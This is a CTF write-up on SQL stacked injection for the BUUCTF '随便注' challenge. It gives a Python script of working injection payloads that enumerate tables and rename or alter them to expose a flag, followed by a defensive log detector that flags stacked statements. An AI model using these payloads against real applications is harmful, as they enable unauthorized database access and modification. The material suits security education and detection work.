SQL Stacked Injection

What is stacked injection? As the name suggests, stacked injection stacks several SQL statements together and has them executed in one go: a semicolon terminates the previous statement and the next statement is appended after it. The first step is to close the open quote and comment out whatever the application appends after the injected value.

Challenge notes: BUUCTF / WEB / [强网杯2019] 随便注

# -*- coding: utf-8 -*-
import requests


url = "http://d9ef2781-d881-400b-8146-ae775ccb7443.node4.buuoj.cn:81/"
#params = {"inject":"3' or '1'='1"} # works
params = {"inject":"3' or '1'='1'#"} # works
params = {"inject":"3' or '1'='1'#sel/**/ect"} # works
params = {"inject":"3' uni/**/on sel/**/ect 1,2,3,4,5#"} # does not work

params = {"inject":"3'; show databases;#"} # stacked injection
params = {"inject":"3'; show tables;#"} # stacked injection, tables: 1919810931114514, words
#params = {"inject":"3'; sel/**/ect * from 1919810931114514;#"} # does not work

params = {"inject":"3'; desc `1919810931114514`;#"} # stacked injection, cols: flag
params = {"inject":"3'; desc `words`;#"} # stacked injection, cols: id, data


params = {"inject":"0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#"} # stacked injection, rename and alter the tables

params = {"inject":"3' or '1'='1'#"} # works, returns the flag

# each assignment above overwrites the previous one; only the last payload is sent
response = requests.get(url, params=params)
print(response.text)
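On the defending side, the two tricks this write-up relies on (a `;` that starts a second statement, and `/**/` inside keywords to slip past a string filter) are exactly what a request-log detector should normalize away before matching. The following is an added example, not code from the original post: it strips inline comments, splits a parameter value on `;`, and reports any trailing fragment that opens a new statement, run over constructed access-log lines that replay this page's payloads.

```python
import re
from urllib.parse import parse_qs, urlsplit

# MySQL reads /**/ as whitespace ("sel/**/ect" is "select"), so strip comments before matching.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Keywords that open a statement; a lone id or search term never needs one after ';'.
STMT_KEYWORDS = {"select", "show", "desc", "describe", "rename", "alter", "drop",
                 "insert", "update", "delete", "set", "prepare", "execute", "handler"}

def normalize(value: str) -> str:
    """Drop inline comments, collapse whitespace and lower-case the value."""
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub("", value)).strip().lower()

def stacked_statements(value: str) -> list[str]:
    """Return every statement that follows a ';' in the normalized parameter value."""
    fragments = [f.strip() for f in normalize(value).split(";")]
    stacked = []
    for frag in fragments[1:]:          # fragments[0] is the value the app meant to embed
        if not frag or frag.startswith(("#", "--")):
            continue                    # a trailing comment, not a statement
        if frag.split(" ", 1)[0] in STMT_KEYWORDS:
            stacked.append(frag)
    return stacked

def scan_request(request_line: str) -> dict[str, list[str]]:
    """Map each query parameter of a 'GET /path?query HTTP/1.1' log entry to its stacked statements."""
    query = urlsplit(request_line.split(" ")[1]).query
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        found = [s for v in values for s in stacked_statements(v)]
        if found:
            hits[name] = found
    return hits

def scan_log(lines: list[str]) -> list[tuple[str, dict[str, list[str]]]]:
    """Return (request_line, hits) for every log entry that carries stacked statements."""
    return [(line, hits) for line in lines if (hits := scan_request(line))]

# Constructed access-log entries replaying this page's payloads as requests would URL-encode them.
SAMPLE_LOG = [
    "GET /?inject=3%27+or+%271%27%3D%271%27%23 HTTP/1.1",
    "GET /?inject=3%27%3B+show+tables%3B%23 HTTP/1.1",
    "GET /?inject=0%27%3Brename+table+words+to+words1%3Brename+table+%601919810931114514%60+to+words%3B"
    "alter+table+words+change+flag+id+varchar%28100%29+CHARACTER+SET+utf8+COLLATE+utf8_general_ci+NOT+NULL"
    "%3Bdesc++words%3B%23 HTTP/1.1",
]

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG):
        print(line, "->", hits)
```

A legitimate value that contains a quoted `;` followed by one of these keywords will also be flagged, which is acceptable for an alert; the fix on the application side remains a parameterized query, with multi-statement execution left disabled in the database driver.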


